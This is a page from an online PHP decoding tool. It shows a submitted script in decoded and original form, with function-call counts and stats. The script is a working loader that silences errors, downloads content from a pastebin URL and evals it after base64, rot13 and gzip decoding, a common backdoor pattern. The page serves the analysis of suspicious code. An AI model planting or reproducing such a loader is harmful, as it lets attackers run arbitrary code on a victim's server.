Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); $alel= file_get_co..
Decoded Output download
<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$alel= file_get_contents('http://pastebin.com/raw/q7pD9wpW');
eval(str_rot13(gzinflate(str_rot13(base64_decode(($alel))))));
?>
Did this file decode correctly?
Original Code
<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$alel= file_get_contents('http://pastebin.com/raw/q7pD9wpW');
eval(str_rot13(gzinflate(str_rot13(base64_decode(($alel))))));
?>
Function Calls
ini_set | 2 |
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
file_get_contents | 1 |
Stats
MD5 | 914f64bdce0537227b007c6b06c1b437 |
Eval Count | 0 |
Decode Time | 99 ms |